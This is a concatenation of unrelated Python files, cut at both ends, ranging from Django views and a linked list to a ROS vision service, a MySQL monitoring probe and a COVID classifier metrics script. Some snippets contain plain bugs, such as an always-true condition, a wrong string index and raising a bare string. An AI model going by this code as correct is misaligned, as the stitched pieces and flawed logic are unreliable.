if op== 'sents':
return part2
if op== 'words':
return [word for sent in part2 for word in sent]
if op != 'sents' or 'words':
return "value of option is not valid, try 'sents' or 'words' instead"
|
"""
https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/
105. Construct Binary Tree from Preorder and Inorder Traversal
Given two integer arrays preorder and inorder where preorder is the preorder traversal of a binary tree and inorder is the inorder traversal of the same tree, construct and return the binary tree.
Input: preorder = [3,9,20,15,7], inorder = [9,3,15,20,7]
Output: [3,9,20,null,null,15,7]
"""
from typing import List
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:
print(preorder, inorder)
def create_tree(preorder, inorder):
if len(preorder) == 0:
return None
# print ("CREATE TREE METHOD")
# print (preorder, inorder)
root = TreeNode(preorder[0])
if len(preorder) == 1:
return root
index = inorder.index(preorder[0])
ltree = inorder[:index]
rtree = inorder[index + 1:]
# print ("ARRAYS")
# print (preorder[1:1+len(ltree)],
# preorder[1+len(ltree):])
# print (ltree, rtree)
root.left = create_tree(preorder[1:1 + len(ltree)], ltree)
root.right = create_tree(preorder[1 + len(ltree):], rtree)
return root
sol = create_tree(preorder, inorder)
return sol
preorder = [1,2]
inorder = [2,1]
ans = Solution().buildTree(preorder, inorder)
preorder = [3,9,20,15,7]
inorder = [9,3,15,20,7]
ans = Solution().buildTree(preorder, inorder)
|
from django.views import generic
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django import forms
from .models import Crag, Route, NameStory, Anecdote
from crags.enums import RouteType, Grade
from django_countries.fields import CountryField
from django.contrib.auth.decorators import login_required
from django.utils.translation import gettext_lazy as _
class HomeView(generic.TemplateView):
template_name = 'crags/home.html'
class IndexCragView(generic.ListView):
model = Crag
template_name = 'crags/crag_index.html'
class DetailCragView(generic.DetailView):
model = Crag
template_name = 'crags/crag_detail.html'
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super().get_context_data(**kwargs)
#crag = Crag.objects.get(id=self.kwargs.get('pk', ''))
# Add in a QuerySet of all the books
context['route_list'] = self.object.route_set.all()
return context
class IndexRouteView(generic.DetailView):
model = Route
template_name = 'crags/route_detail.html'
class ResultsCragView(generic.DetailView):
model = Crag
template_name = 'crags/detail.html'
class IndexAnecdoteView(generic.ListView):
model = Anecdote
template_name = 'crags/index.html'
context_object_name = 'anecdote_list'
paginate_by = 15
class DetailAnecdoteView(generic.DetailView):
model = Anecdote
class DetailNameStoryView(generic.DetailView):
model = NameStory
# template_name = 'stories/name_story_detail.html'
class AnecdoteForm(forms.Form):
anecdote = forms.CharField(label=_("Anecdote"), max_length=5000, widget=forms.Textarea)
source = forms.CharField(label=_("Source"), max_length=500)
class NameStoryForm(forms.Form):
story = forms.CharField(label=_("Story"), max_length=5000, widget=forms.Textarea)
source = forms.CharField(label=_("Source"), max_length=500)
class CragForm(forms.Form):
name = forms.CharField(label=_("Name"), max_length=500)
country = CountryField().formfield()
class RouteForm(forms.Form):
name = forms.CharField(label=_("Name"), max_length=500)
type = forms.ChoiceField(label=_("Type"), choices=RouteType.choices())
description = forms.CharField(label=_("Description"), max_length=5000, widget=forms.Textarea)
openIn = forms.DateField(label=_("Opening date"), widget=forms.SelectDateWidget)
faIn = forms.DateField(label=_("First ascent date"), widget=forms.SelectDateWidget)
@login_required
def add_anecdote_view(request, pk_crag, pk_route):
route = get_object_or_404(Route, pk=pk_route)
if request.method == 'POST':
form = AnecdoteForm(request.POST)
if form.is_valid():
a = Anecdote(route=route, anecdote=form.cleaned_data['anecdote'],
source=form.cleaned_data['source'], isValidated=False)
a.save()
return HttpResponseRedirect(reverse('crags:route_detail', args=[pk_crag, pk_route]))
else:
form = AnecdoteForm()
return render(request, 'crags/anecdote_create.html', {'form': form, 'route': route})
@login_required
def add_name_story_view(request, pk_crag, pk_route):
route = get_object_or_404(Route, pk=pk_route)
if request.method == 'POST':
form = NameStoryForm(request.POST)
if form.is_valid():
n = NameStory(route=route, story=form.cleaned_data['story'],
source=form.cleaned_data['source'], isValidated=False)
n.save()
return HttpResponseRedirect(reverse('crags:route_detail', args=[pk_crag, pk_route]))
else:
form = NameStoryForm()
return render(request, 'crags/name_story_create.html', {'form': form, 'route': route})
@login_required
def add_crag_view(request):
if request.method == 'POST':
form = CragForm(request.POST)
if form.is_valid():
n = Crag(name=form.cleaned_data['name'], country=form.cleaned_data['country'], isValidated=False)
n.save()
return HttpResponseRedirect(reverse('crags:crags_index'))
else:
form = CragForm()
return render(request, 'crags/crag_create.html', {'form': form})
@login_required
def add_route_view(request, pk_crag):
crag = get_object_or_404(Crag, pk=pk_crag)
if request.method == 'POST':
form = RouteForm(request.POST)
if form.is_valid():
n = Route(name=form.cleaned_data['name'], crag=crag, type=form.cleaned_data['type'],
openIn=form.cleaned_data['openIn'], description=form.cleaned_data['description'],
faIn=form.cleaned_data['faIn'], isValidated=False)
n.save()
return HttpResponseRedirect(reverse('crags:route_detail', args=[pk_crag, n.id]))
else:
form = RouteForm()
return render(request, 'crags/route_create.html', {'form': form, 'crag': crag})
|
#!/usr/bin/python3.7
import json
import typing
from classes import Student, Room
class Controller:
def __init__(self, students_path : str, rooms_path : str):
# chech files existens
if self.check_file_not_exists(students_path) and self.check_file_not_exists(rooms_path):
exit()
self.students_path = students_path
self.rooms_path = rooms_path
self.rooms = {}
# add students to rooms
def concatinate_students_to_rooms_from_json(self) -> None:
# add rooms
for room in self.import_rooms_from_json():
self.rooms[room.id] = room
# add students to rooms
for student in self.import_students_from_json():
self.rooms[student.room].addStudent(student)
def import_rooms_from_json(self) -> typing.Iterable[Room]:
with open(self.rooms_path, 'r') as rooms_file:
for room in json.load(rooms_file):
yield Room(**room)
def import_students_from_json(self) -> typing.Iterable[Student]:
with open(self.students_path, 'r') as students_file:
for student in json.load(students_file):
yield Student(**student)
def export_json(self, output_path : str):
with open(output_path, 'w') as outfile:
json.dump(list(self.rooms.values()), outfile, indent=2, default=self.my_jsonEncoder)
def export_xml(self, output_path : str):
with open(output_path, 'w') as outfile:
for r in self.rooms.values():
# generator of students in rooms write
for i in r.to_xml():
outfile.write(i)
@staticmethod
def my_jsonEncoder(obj: object):
return obj.to_json()
# check files existense
def check_file_not_exists(self, path : str) -> bool:
try:
open(path, "r")
return False
except FileNotFoundError:
print("File " + path + " not exist")
return True
if __name__ == "__main__":
# check input
import argparse
parser = argparse.ArgumentParser(description='give 3 arguments - path to students.json, path to rooms.json, output_path path (<name>.json,xml)')
parser.add_argument('students', metavar='[path to students.json]', type=str, help='path to students.json file')
parser.add_argument('rooms', metavar='[path to rooms.json]', type=str, help='path to rooms.json file')
parser.add_argument('output_file', metavar='[output file (xml or json)]', type=str, help='output file ( xml or json) file')
args = parser.parse_args()
# init controller
file_controll = Controller(students_path = args.students, rooms_path = args.rooms)
# students to rooms & file export
file_controll.concatinate_students_to_rooms_from_json()
if args.output_file[3][-3:] == 'xml':
file_controll.export_xml(output_path = args.output_file)
else:
file_controll.export_json(output_path = args.output_file)
|
from unittest import TestCase
from src import core_printer
class TestCorePrinters(TestCase):
p = core_printer.CorePrinters()
def test_blue_text(self):
msg1 = self.p.blue_text("test")
msg2 = "\x1b[34m [*] \x1b[0mtest"
self.assertEqual(msg1, msg2)
def test_green_text(self):
msg1 = self.p.green_text("test")
msg2 = "\x1b[32m [+] \x1b[0mtest"
self.assertEqual(msg1, msg2)
def test_print_entry(self):
self.p.print_entry()
def test_print_d_module_start(self):
self.p.print_d_module_start()
def test_print_s_module_start(self):
self.p.print_s_module_start()
def test_print_config_start(self):
self.p.print_config_start()
def test_print_modules(self):
self.p.print_modules(['modules/bing_search.py'])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020-04-12 21:24:13
# @Author : Fallen (xdd043@qq.com)
# @Link : https://github.com/fallencrasher/python-learning
# @Version : $Id$
# lambda function
# lambda 参数1,参数2:表达式
#语法:
# 函数名 = lambda 参数:返回值
# 1)此函数不是没有名字,他是有名字的,他的名字就是你给其设置的变量,比如func.
# 2)lambda 是定义匿名函数的关键字,相当于函数的def.
# 3)lambda 后面直接加形参,形参加多少都可以,只要用逗号隔开就行。
func1 = lambda a,b:a+b
print(func1(1,2))
#写匿名函数:接收一个可切片的数据,返回索引为0与2的对应的元素(元组形式)。
func2 = lambda a:(a[0],a[2])
print(func2([1,2,3,4]))
#写匿名函数:接收两个int参数,将较大的数据返回。
func3 = lambda a,b:a if a>b else b
print(func3(1,4))
|
from yolact_interface import YolactInterface
import roslibpy
import numpy as np
import cv2
import base64
import os
class YolactService:
def __init__(self, model_pth, srv_name, srv_type, host, port=9090, img_height=480, img_width=640):
self.ros = roslibpy.Ros(host=host, port=port)
self.ros.connect()
self.model = YolactInterface(model_pth) # TODO: Change load model function
self.srv_name = srv_name
self.srv_type = srv_type
self.h = img_height
self.w = img_width
init_input = np.zeros([self.h, self.w, 3], np.uint8)
self.model.run_once(init_input) # TODO: Change inference once function
def yolact_handler(self, request, response):
print(request["image"])
byte_data = base64.b64decode(request['image']['data'])
np_img = np.frombuffer(byte_data, np.uint8)
src = cv2.imdecode(np_img, cv2.IMREAD_COLOR)
if src.shape[0] == self.h and src.shape[1] == self.w:
cv2.imshow('input', src)
cv2.waitKey(1)
response["result"] = self.model.run_once(src) # TODO: Change inference once function
print(response["result"])
return True
else:
return False
def run(self):
# start receiving client call...
service = roslibpy.Service(self.ros, self.srv_name, self.srv_type)
service.advertise(self.yolact_handler)
print("Service start!")
self.ros.run_forever()
# if roslibpy lose connect with ros master and reconnect,
# topics will not re-subscribe, see:
# https://github.com/gramaziokohler/roslibpy/issues/29
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='YOLACT ROS SERVER')
parser.add_argument("--host", type=str, default="219.216.101.117", help="host of ros master")
parser.add_argument("--port", type=int, default=9090, help="port of rosbridge")
parser.add_argument("--srv_name", type=str, default="/run_yolact", help="advertise ros service name")
parser.add_argument("--img_height", type=int, default=480, help="input image height")
parser.add_argument("--img_width", type=int, default=640, help="input image width")
parser.add_argument("--srv_type", type=str, default="semantic_msgs/RunInstance", help="advertise ros service type")
parser.add_argument("--model_pth", type=str, default="./weights/yolact_base_54_800000.pth", help="weight path of yolact")
parser.add_argument("--cuda_device", type=int, default=1, help="cude device id")
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.cuda_device)
ys = YolactService(args.model_pth, args.srv_name, args.srv_type, args.host, args.port, args.img_height, args.img_width)
ys.run()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Valiant Systems and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe import _
from frappe.desk.form.linked_with import get_linked_doctypes
class Section(Document):
pass
@frappe.whitelist()
def get_chapter_list(course):
chapterlist = frappe.get_all('Chapter', fields=['name'], filters = {'course': course})
return chapterlist
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.landing, name='landing'),
url(r'^process$', views.process, name='login_process'),
url(r'^dashboard$', views.dashboard, name='dashboard'),
url(r'^dashboard/logout$', views.logout, name='logout'),
]
|
# Generated by Django 2.2.3 on 2019-09-18 05:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('kieFrontApp', '0003_auto_20190715_1308'),
]
operations = [
migrations.AddField(
model_name='user',
name='cuisine_preference',
field=models.IntegerField(blank=True, choices=[(0, 'none'), (1, 'chinese'), (2, 'malay'), (3, 'indian'), (4, 'western')], default=0, null=True),
),
]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# -----------------------------------------------------------------------------
# 示例一、闭包函数,在外部函数设定环境变量
x = 100
def fun1():
"""
在外部函数中设置环境变量 x
fun1() 在运行时,给对象 a 返回一个函数 fun2()
同时将 x = 200 作为环境变量绑定到 a 内
"""
x = 200
def fun2():
y = x + 1
return y
return fun2
a = fun1()
print(a())
print('x的当前值为:', x)
# -----------------------------------------------------------------------------
# 示例二、闭包函数,不设定环境变量
x = 100
def fun1():
"""
fun2() 会按照 LEGB 法则,向上寻找变量 x,在全局作用域里获取变量 x = 100
"""
def fun2():
y = x + 1
return y
return fun2
a = fun1()
print(a())
print('x的当前值为:', x)
# -----------------------------------------------------------------------------
# 示例三、闭包函数,使用全局变量 global
x = 100
def fun1():
"""
global 声明 x 为全局变量,自动从全局作用域获取变量 x = 100
同时在 x 修改后,全局作用域的 x 的值也会被修改
"""
def fun2():
global x
x = x + 1
return x
return fun2
a = fun1()
print(a())
print('x的当前值为:', x)
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Vladimir Shurygin. All rights reserved.
#
class User:
def __init__(self, name: str, email: str = None):
self.name = name
self.email = email
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.name == other.name
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.name)
def __repr__(self):
return f"<User(name='{self.name}', email='{self.email}')>"
|
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score
#1. 데이터
learn_data = [[0,0], [1,0], [0,1], [1,1]]
learn_label = [0,0,0,1]
#2. 모델
clf = LinearSVC() #clf = model
#3. 학습
clf.fit(learn_data, learn_label)
#4. 평가
x_test = [[0,0], [1,0], [0,1], [1,1]]
y_pred = clf.predict(x_test)
print(x_test, "예측 결과", y_pred)
print('acc = ', accuracy_score([0,0,0,1], y_pred)) |
"""
1) Insertion, deletion and search of singly-linked list;
2) Assumes int type for data in list nodes.
Author: Wenru
"""
from typing import Optional
class Node:
def __init__(self, data: int, next=None):
self.data = data
self._next = next
class SinglyLinkedList:
def __init__(self):
self._head = None
def find_by_value(self, value: int) -> Optional[Node]:
p = self._head
while p and p.data != value:
p = p._next
return p
def find_by_index(self, index: int) -> Optional[Node]:
p = self._head
position = 0
while p and position != index:
p = p._next
position += 1
return p
def insert_value_to_head(self, value: int):
new_node = Node(value)
self.insert_node_to_head(new_node)
def insert_node_to_head(self, new_node: Node):
if new_node:
new_node._next = self._head
self._head = new_node
def insert_value_after(self, node: Node, value: int):
new_node = Node(value)
self.insert_node_after(node, new_node)
def insert_node_after(self, node: Node, new_node: Node):
if not node or not new_node:
return
new_node._next = node._next
node._next = new_node
def insert_value_before(self, node: Node, value: int):
new_node = Node(value)
self.insert_node_before(node, new_node)
def insert_node_before(self, node: Node, new_node: Node):
if not self._head or not node or not new_node:
return
if self._head == node:
self.insert_node_to_head(new_node)
return
current = self._head
while current._next and current._next != node:
current = current._next
if not current._next: # node is not even in the list
return
new_node._next = node
current._next = new_node
def delete_by_node(self, node: Node):
if not self._head or not node:
return
if node._next:
node.data = node._next.data
node._next = node._next._next
return
# node is the last one or not in the list
current = self._head
while current and current._next != node:
current = current._next
if not current: # node not in the list
return
current._next = None
def delete_by_value(self, value: int):
if not self._head or not value:
return
fake_head = Node(value+1)
fake_head._next = self._head
prev, current = fake_head, self._head
while current:
if current.data != value:
prev._next = current
prev = prev._next
current = current._next
if prev._next:
prev._next = None
self._head = fake_head._next # in case head.data == value
def __repr__(self) -> str:
nums = []
current = self._head
while current:
nums.append(current.data)
current = current._next
if len(nums) > 0:
return "->".join(str(num) for num in nums)
else:
return ""
def print_all(self):
current = self._head
if current:
print(f"{current.data}", end="")
current = current._next
while current:
print(f"->{current.data}", end="")
current = current._next
print("\n", flush=True)
if __name__ == "__main__":
l = SinglyLinkedList()
for i in range(15):
l.insert_value_to_head(i)
node9 = l.find_by_value(9)
l.insert_value_before(node9, 20)
l.insert_value_before(node9, 16)
l.insert_value_before(node9, 16)
l.delete_by_value(16)
node11 = l.find_by_index(3)
l.delete_by_node(node11)
l.delete_by_node(l._head)
l.delete_by_value(13)
print(l) |
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# André Anjos <andre.anjos@idiap.ch>
# Thu Jan 20 18:08:37 2011 +0100
#
# Copyright (C) 2011-2012 Idiap Research Institute, Martigny, Switzerland
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""A wrapper for cmake that explains the options and has nice defaults.
"""
def main():
"""Calculates the platform string."""
from platform import system, architecture
base = system().lower()
if base == 'darwin':
base = 'macosx' #change name to something nicer and easy to identify
arch = architecture()[0]
if arch == '32bit': arch = 'i686'
elif arch == '64bit': arch = 'x86_64'
print '%s-%s' % (base, arch)
if __name__ == '__main__':
main()
|
num = int(input("Enter a number: "))
if (num % 2) == 0:
print("X adalah genap")
else:
print("X adalah ganjil") |
from django.urls import path
from drfvg import register_models
## models to register
from .models.technical_sheet import TechnicalSheet
## documents/
urlpatterns = [ ] + register_models( [ TechnicalSheet ], app_name='documents')
|
import pyqrcode
from pyqrcode import QRCode
s = "https://www.youtube.com/channel/UCeO9hPCfRzqb2yTuAn713Mg"
url = pyqrcode.create(s)
url.svg("myyoutube.svg", scale = 8)
|
#!/usr/bin/env python
##############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2011.
# See http://www.eu-egee.org/partners/ for details on the copyright
# holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
#
# NAME : check_request_per_user
#
# DESCRIPTION : Checks the available space per space token
#
# AUTHORS : Alexandre.Beche@cern.ch
#
##############################################################################
import commands
import datetime
import MySQLdb
import os
import time
from lcgdmcommon import *
class check_request_per_user:
"""Checks the available space per space token"""
__version__ = "0.0.1"
__nagios_id__ = "DM-REQUEST-PER-USER"
DEFAULT_WARNING = 30
DEFAULT_CRITICAL = 10
DEFAULT_INTERVAL = 10
DEFAULT_RESULTS = 3
DEFAULT_HOST = "localhost"
# Specific parameters, where key = short, value = long (i.e. {"h":"help", "C:":"command="})
# getopt format. The long version will be the one passed even when the short is specified
__additional_opts__ = {"w:": "warning=",
"c:": "critical=",
"i:": "interval=",
"r:": "results=",
"h:": "host=",
"u:": "user=",
"p:": "password="}
# Specific usage information
__usage__ = """
\t-w, --warning\tDefault warning threshold in percent of unused space in a space token. (Default: %d ).
\t-c, --critical\tDefault warning threshold in percent of unused space in a space token. (Default: %d ).
\t-i, --period\tDefault interval of time to retrieve the request in minute. (Default: %d).
\t-r, --restults\tLimit the query to the %d user with the max queries.
\t-h, --host\tname of the machine which host the dpm_db database. (Default: %s).
\t-u, --user\tusername used for login to the database.
\t-p, --password\tpassword used for login to the database.
Description of work executed by the probe:
""" % (DEFAULT_WARNING, DEFAULT_CRITICAL, DEFAULT_INTERVAL, DEFAULT_RESULTS, DEFAULT_HOST)
# Methods
def __init__(self, opt = {}, args = []):
"""
Constructor
@param opt Contains a dictionary with the long option name as the key, and the argument as value
@param args Contains the arguments not associated with any option
"""
opt_warning = self.DEFAULT_WARNING
opt_critical = self.DEFAULT_CRITICAL
opt_interval = self.DEFAULT_INTERVAL
opt_results = self.DEFAULT_RESULTS
opt_host = self.DEFAULT_HOST
opt_user = None
opt_password = None
if "warning" in opt:
opt_warning = opt["warning"]
if "critical" in opt:
opt_critical = opt["critical"]
if "interval" in opt:
opt_interval = opt["interval"]
if "results" in opt:
opt_results = opt["results"]
if "host" in opt:
opt_host = opt["host"]
if "user" in opt:
opt_user = opt["user"]
if "password" in opt:
opt_password = opt["password"]
self.warning = int(opt_warning)
self.critical = int(opt_critical)
self.interval = int(opt_interval)
self.results = int(opt_results)
self.host = opt_host
self.user = opt_user
self.password = opt_password
def main(self):
"""
Test code itself. May raise exceptions.
@return A tuple (exit code, message, performance)
"""
return_code = EX_OK
return_data = ""
performance_data = ""
# Connect
try:
self.mysql = MySQLdb.connect(host = self.host,
user = self.user, passwd = self.password)
except:
return (EX_UNKNOWN, "Connection to the database failed", None)
# Use the correct DB
cursor = self.mysql.cursor()
cursor.execute("use dpm_db")
# Prepare the query
sql = "SELECT substring(client_dn,locate(\"CN=\", client_dn)+3), count(client_dn)"
sql += " FROM dpm_req"
sql += " WHERE ctime > (UNIX_TIMESTAMP(NOW())- " + str(self.interval * 60) + ")"
sql += " GROUP BY substring(client_dn,locate(\"CN=\", client_dn)+3)"
sql += " ORDER BY count(client_dn) DESC LIMIT " + str(self.results) + ";";
# Exeute the query
cursor.execute(sql)
total_request = 0
for cn, requests in cursor.fetchall():
total_request += requests
performance_data += "\"" + cn + "\"=" + str(requests) + " "
return_data = str(total_request) + " request(s) have been executed by the top " + str(self.results) + " DN"
return (return_code, return_data, performance_data)
# When called directly
if __name__ == "__main__":
run(check_request_per_user)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import csv
array=[['wrong_covid_normal','wrong_covid_pneu','correct_covid'],
['wrong_pneu_normal','correct_pneu','wrong_pneu_covid'],
['correct_normal','wrong_normal_pneu','wrong_normal_covid']]
results={1:{},2:{},3:{},4:{},5:{}}
for fo in range(1,6):
report=pd.read_excel('results/selected_fold{}.xlsx'.format(fo))
data={}
for index,item in report.iterrows():
images_num=item['tp']+item['fp']
data[item['name']]=[[],[],[]]
acc=item['tp']/(item['tp']+item['fp'])
covid_recall=item['correct_covid']/item['covid_num']
covid_Specificity=(images_num-item['covid_num']-item['wrong_covid'])/(images_num-item['covid_num']-item['wrong_covid']+item['wrong_covid'])
covid_accuracy=(images_num-item['covid_num']-item['wrong_covid']+item['correct_covid'])/(images_num-item['covid_num']-item['wrong_covid']+item['correct_covid']+item['wrong_covid']+item['not_detected_covid'])
pneu_recall=item['correct_pneu']/item['pneu_num']
pneu_Specificity=(images_num-item['pneu_num']-item['wrong_pneu'])/(images_num-item['pneu_num']-item['wrong_pneu']+item['wrong_pneu'])
pneu_accuracy=(images_num-item['pneu_num']-item['wrong_pneu']+item['correct_pneu'])/(images_num-item['pneu_num']-item['wrong_pneu']+item['correct_pneu']+item['wrong_pneu']+item['not_detected_pneu'])
normal_recall=item['correct_normal']/item['normal_num']
normal_Specificity=(images_num-item['normal_num']-item['wrong_normal'])/(images_num-item['normal_num']-item['wrong_normal']+item['wrong_normal'])
normal_accuracy=(images_num-item['normal_num']-item['wrong_normal']+item['correct_normal'])/(images_num-item['normal_num']-item['wrong_normal']+item['correct_normal']+item['wrong_normal']+item['not_detected_normal'])
results[fo][item['name']]={'acc':acc,'covid_recall':covid_recall,'covid_Specificity':covid_Specificity,
'covid_accuracy':covid_accuracy,'pneu_recall':pneu_recall,'pneu_Specificity':pneu_Specificity,
'pneu_accuracy':pneu_accuracy,
'normal_recall':normal_recall,'normal_Specificity':normal_Specificity,
'normal_accuracy':normal_accuracy}
for nn,aa in enumerate(array):
for a in aa:
data[item['name']][nn].append(item[a])
for key in data:
gt = ['NORMAL','PNEUMONIA','COVID-19']
preds = ["COVID-19", "PNEUMONIA", "NORMAL",]
fig, ax = plt.subplots()
im = ax.imshow(np.array(data[key]), interpolation='nearest', cmap=plt.cm.Blues)
index=key.find('-')
if 'concatenat' in key:
ax.set(xticks=np.arange(np.array(data[key]).shape[1]),
yticks=np.arange(np.array(data[key]).shape[0]),
# ... and label them with the respective list entries
xticklabels=gt, yticklabels=preds,
title='Confusion Matrix for the concatenated network-fold{}'.format(fo),
ylabel='Ground Truth Label',
xlabel='Predicted Label')
else:
ax.set(xticks=np.arange(np.array(data[key]).shape[1]),
yticks=np.arange(np.array(data[key]).shape[0]),
# ... and label them with the respective list entries
xticklabels=gt, yticklabels=preds,
title='Confusion Matrix for {}-fold{}'.format(key[:index],fo),
ylabel='Ground Truth Label',
xlabel='Predicted Label')
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
fmt = '.2f'
thresh = 1000000.
# Loop over data dimensions and create text annotations.
for i in range(len(gt)):
for j in range(len(preds)):
ax.text(j, i, format(np.array(data[key])[i, j]),
ha="center", va="center",
color="white" if np.array(data[key])[i, j] > thresh else "black")
fig.tight_layout()
#plt.show()
dash=key.find('-')
plt.savefig('{}-fold{}-confusion_matrix.pdf'.format(key[:dash],fo))
results['Full']={'Xception':{}, 'concatenate':{},'ResNet50V2':{}}
results['average']={'Xception':{}, 'concatenate':{},'ResNet50V2':{}}
nets=['Xception','ResNet50V2','concatenate']
for net in nets:
for fokey in results:
for netkey in results[fokey]:
if net in netkey:
for param in results[fokey][netkey]:
if param not in results['Full'][net]:
results['Full'][net][param]=[]
results['Full'][net][param].append(results[fokey][netkey][param])
for net in results['Full']:
for param in results['Full'][net]:
results['average'][net][param]=np.average(results['Full'][net][param][:-1])
temp_data=[]
for fo in [1,2,3,4,5,'average']:
for net in results[fo]:
if 'Xception' in net:
temp_data.append([results[fo][net]['covid_Specificity'],
results[fo][net]['pneu_Specificity'],
results[fo][net]['normal_Specificity'],
results[fo][net]['covid_accuracy'],
results[fo][net]['pneu_accuracy'],
results[fo][net]['normal_accuracy']])
for net in results[fo]:
if 'ResNet' in net:
temp_data.append([results[fo][net]['covid_Specificity'],
results[fo][net]['pneu_Specificity'],
results[fo][net]['normal_Specificity'],
results[fo][net]['covid_accuracy'],
results[fo][net]['pneu_accuracy'],
results[fo][net]['normal_accuracy']])
for net in results[fo]:
if 'oncatenat' in net:
temp_data.append([results[fo][net]['covid_Specificity'],
results[fo][net]['pneu_Specificity'],
results[fo][net]['normal_Specificity'],
results[fo][net]['covid_accuracy'],
results[fo][net]['pneu_accuracy'],
results[fo][net]['normal_accuracy']])
|
#!/usr/bin/env python
#
# Build LSE trees from a distance matrix and a topology
#
#
# python libs
import copy
import os
import sys
import StringIO
import shutil
from os.path import join, realpath, dirname
# spidir lib
try:
import Spidir
except ImportError:
sys.path.append(join(realpath(dirname(dirname(__file__))), "lib"))
import spidir
# rasmus libs
from rasmus import treelib
from rasmus import util
# rasmus.bio libs
from rasmus.bio import alignlib
from rasmus.bio import fasta
from rasmus.bio import phylip
from rasmus.bio import phylo
options = [
["v", "verbose", "verbose", "",
{"single": True}],
["m:", "minsize=", "minsize", "<minimum gene family size>",
{"single": True,
"default": 3,
"parser": int,
"help": "minimum gene family size to reconstruct"}],
["M:", "maxsize=", "maxsize", "<maximum gene family size>",
{"single": True,
"default": 1000000000, # no limit (effectively)
"parser": int,
"help": "maximum gene family size to reconstruct"}],
["i", "stdin", "stdin", "",
{"single": True}],
"Output extensions",
["F:", "fastaext=", "fastaext", "<fasta extension",
{"default": [".fa", ".fasta"]}],
["A:", "alignext=", "alignext", "<align extension>",
{"default": [".aln", ".afa", ".align"]}],
["T:", "treeext=", "treeext", "<tree extension>",
{"default": [".tree"]}],
["U:", "usertreeext=", "usertreeext", "<user tree extension>",
{"single": True,
"default": None}],
["D:", "distext=", "distext", "<distance matrix extension>",
{"default": [".dist"]}],
]
conf = util.parseOptions(sys.argv, options,
resthelp="<alignments> ...", quit=True)
# filenames
def getFastaFile(conf, basename):
return basename + conf["fastaext"][-1]
def getAlignFile(conf, basename):
return basename + conf["alignext"][-1]
def getDistFile(conf, basename):
return basename + conf["distext"][-1]
def getDistFiles(conf, basename):
return [basename + x for x in conf["distext"]]
def getTreeFile(conf, basename):
return basename + conf["treeext"][-1]
def getUserTreeFile(conf, basename):
return basename + conf["usertreeext"]
def getLabelFile(conf, basename):
return getAlignFile(conf, basename)
def getUserTree(conf, basename):
if conf["usertreeext"] != None:
return treelib.read_tree(getUserTreeFile(conf, basename))
else:
return conf["usertree"]
def getFileType(conf, infile):
"""Determine the file type of 'infile'"""
for ext in conf["fastaext"]:
if infile.endswith(ext):
return "fasta", util.replace_ext(infile, ext, "")
for ext in conf["alignext"]:
if infile.endswith(ext):
return "align", util.replace_ext(infile, ext, "")
for ext in conf["treeext"]:
if infile.endswith(ext):
return "tree", util.replace_ext(infile, ext, "")
for ext in conf["distext"]:
if infile.endswith(ext):
return "dist", util.replace_ext(infile, ext, "")
raise "unknown file type '%s'" % infile
def checkFamilySize(conf, size, filename):
if size < conf["minsize"] or size > conf["maxsize"]:
print "skipping '%s'; family size %d outside [%d, %d]" % \
(filename, size, conf["minsize"], conf["maxsize"])
return False
return True
def getDataFiles(conf, infile):
infileType, basename = getFileType(conf, infile)
if infileType == "fasta":
fastafile = infile
alignfile = getAlignFile(conf, basename)
distfile = getDistFile(conf, basename)
labelfile = getLabelFile(conf, basename)
treefile = getTreeFile(conf, basename)
elif infileType == "align":
if "fastaext" in conf:
fastafile = getFastaFile(conf, basename)
else:
fastafile = None
alignfile = infile
distfile = getDistFile(conf, basename)
labelfile = getLabelFile(conf, basename)
treefile = getTreeFile(conf, basename)
elif infileType == "tree":
if "fastaext" in conf:
fastafile = getFastaFile(conf, basename)
else:
fastafile = None
alignfile = getAlignFile(conf, basename)
distfile = getDistFile(conf, basename)
labelfile = getLabelFile(conf, basename)
treefile = infile
elif infileType == "dist":
if "fastaext" in conf:
fastafile = getFastaFile(conf, basename)
else:
fastafile = None
if "alignext" in conf:
alignfile = getAlignFile(conf, basename)
else:
alignfile = None
distfile = infile
labelfile = getLabelFile(conf, basename)
treefile = getTreeFile(conf, basename)
if not os.path.exists(labelfile):
labelfile = None
return fastafile, alignfile, distfile, labelfile, treefile
def run(conf, infile):
# determine infile type
infileType, basename = getFileType(conf, infile)
fastafile, alignfile, distfile, labelfile, treefile = \
